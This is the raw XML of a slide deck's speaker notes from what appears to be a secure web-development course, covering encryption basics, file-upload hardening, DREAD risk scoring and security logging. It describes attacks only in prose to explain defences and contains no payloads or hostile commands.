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media/image1.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2.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3.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 Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide184.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide185.xml"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide186.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide187.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide188.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide189.xml"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide190.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide191.xml"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide192.xml"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide193.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide194.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide195.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide196.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide197.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide198.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide199.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide200.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide201.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide202.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide203.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide204.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide205.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide206.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide207.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide208.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide209.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide210.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide211.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide212.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide213.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide214.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide215.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide216.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide217.xml"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide218.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide219.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide220.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide221.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide222.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide223.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide224.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide225.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide226.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide227.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide228.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide229.xml"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide230.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide231.xml"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide232.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide233.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide234.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide235.xml"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide236.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide237.xml"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide238.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide239.xml"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide240.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide241.xml"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide242.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide243.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide244.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide245.xml"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24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p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 56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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/></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156.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178.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20.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225.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234.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235.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237.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238.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239.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240.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241.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242.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24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8" name="Shape 738"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="739" name="Shape 739"/>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Idea: Make the cost of unauthorized retrieval of a message significantly higher than the value of the message</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Encryption is the process of making information unreadable by unauthorized persons</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> Cryptographic algorithms can be:</a:t>
            </a:r>
            <a:endParaRPr sz="16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0" name="Shape 1200"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Shape 1201"/>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Comment that neither of these properties are set by default, which means C# projects is not protected by default, but VB.NET projects are.</a:t>
            </a:r>
            <a:endParaRPr sz="16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3" name="Shape 1243"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244" name="Shape 1244"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>All depends on when a user has more control on your resources that you…</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Authenticate as early as possible, if you see something going bad… slap ‘em around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4" name="Shape 1254"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1255" name="Shape 1255"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" sz="1100"/>
              <a:t>In general, try to store client-supplied files on their own partition.  Avoid storing them on the same partition as the web site, and always avoid storing them on the system drive.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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 </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An attacker might be able to exhaust free space on the system drive or the web site drive, resulting in unexpected behavior by the OS or the web site.</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 </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Alternately, if the attacker can do a directory-traversal attack, then the attacker might be able to replace system or web site files, thereby compromising the web server system.</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 </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" sz="1100"/>
              <a:t>If client-supplied files are stored on the web site partition, make sure that they </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" sz="1100" u="sng"/>
              <a:t>never</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" sz="1100"/>
              <a:t> reside within the web site directory tree.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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 </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Allowing client-supplied files in the web site directory tree might result in an attacker being able to upload a malicious .asp file, and then navigate to it using an HTTP GET request.  This would cause the server to execute the attacker-supplied page using the identity of the web application account.</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 </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Alternately, an attacker might upload a file containing malicious script, and then lure a victim user to access the same file via GET, effectively resulting in a cross-site script exploit.</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 </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" sz="1100"/>
              <a:t>The HTTP POST method is preferable to the HTTP PUT method.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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 </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When using the PUT method, you need to take extra care to ensure that user-supplied files cannot be accessed with other methods such as GET.</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 </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This would result in the same cross-site script attack described above.</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 </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" sz="1100"/>
              <a:t>Scan client-supplied files for viruses.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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 </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But never assume that files which pass a virus scan are completely safe.</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 </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" sz="1100"/>
              <a:t>Limit the size of uploaded files if possible, and allocate server-side resources sparingly.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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 </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Attackers who can upload extremely large files can potentially deplete or exhaust server resources, resulting in unexpected behavior by the server or web site.</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 </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" sz="1100"/>
              <a:t>When storing client-supplied files on disk, generate your own file paths and file names.  Do not allow user-supplied data to influence the path or name of the file as it is actually stored on disk.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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 </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By depriving attackers of the ability to influence how your application performs file-level I/O, you all but eliminate a number of possible attacks, such as directory traversal, induced filename collisions, and more.</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 </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If it is necessary to store the file on disk using an attacker-supplied name, you should do the following:</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 </a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>Use the Path.GetFilename method to safely retrieve a valid filename from the client-supplied value. </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 </a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>Use a directory path you choose yourself, without allowing user input to influence the directory path. </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 </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" sz="1100"/>
              <a:t>Treat client-supplied files like any other element of user input and validate, validate, validate.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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 </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Discard any file which does not have an extension or name that is explicitly allowed or expected by your application.</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 </a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100"/>
              <a:t>Also consider inspecting the internal contents of the file to ensure that it is of the type advertised by the user-supplied name or extension.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9" name="Shape 1259"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Shape 1260"/>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 Creating a server-side script file (.asp, etc.)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7" name="Shape 1267"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Shape 1268"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="1400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400"/>
              <a:t>If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following:</a:t>
            </a:r>
            <a:endParaRPr sz="16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2" name="Shape 1272"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1273" name="Shape 1273"/>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After you ask the above questions, count the values (1–3) for a given threat.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> The result can fall in the range of 5–15. Then you can treat threats with overall ratings of 12–15 as High risk, 8–11 as Medium risk, and 5–7 as Low risk.</a:t>
            </a:r>
            <a:endParaRPr sz="16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0" name="Shape 1290"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1291" name="Shape 1291"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Monitoring and response… on top of setting up perimeters </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Log as soon as you have a failure…</a:t>
            </a:r>
            <a:endParaRPr sz="16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5" name="Shape 1295"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1296" name="Shape 1296"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Who, what, where, when… figure out the why…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3" name="Shape 1303"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1304" name="Shape 1304"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
